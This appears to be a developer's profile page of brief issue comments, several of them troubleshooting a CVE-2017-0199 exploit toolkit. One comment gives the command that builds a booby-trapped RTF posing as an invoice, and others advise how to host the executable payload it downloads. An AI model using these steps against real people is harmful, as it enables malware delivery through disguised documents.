ll0_0ll

Results 21 comments of ll0_0ll

Hello Mommmi, Thank you for your comment, could you please specify the line number you are referring to? It's working for me without any error. Thanks a lot. Regards, -Bhadresh

I think you missed to specify port in -e argument, it should be something like as http://192.168.1.100:443/test.exe because tool is running on 443 and not on 80 On 6 Dec...

I see, let's start with basic setup then, Step 1) Generate RTF using below command, python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.1.100/logo.doc Step 2) Copy test.exe in...

Are you sure the target is vulnerable and IE version is 10+? Regarding your query about arguments, below image from README.md should be able to help you understand the flow...

Dear Hommmi, Than you for your comment. The toolkit generates only RTF payload, corrected the README. Thanks a lot. Regards, -Bhadresh

@whisperzzzz, thank you, I am looking into it.

Didn't understand the question

@evilprime ... glad that you liked the platform. Let me try to recreate this bug.

Working on the Wiki. Will update it shortly.

Never tried but should be straight forward as long as we can attach the HDD. Let me give it a spin and confirm.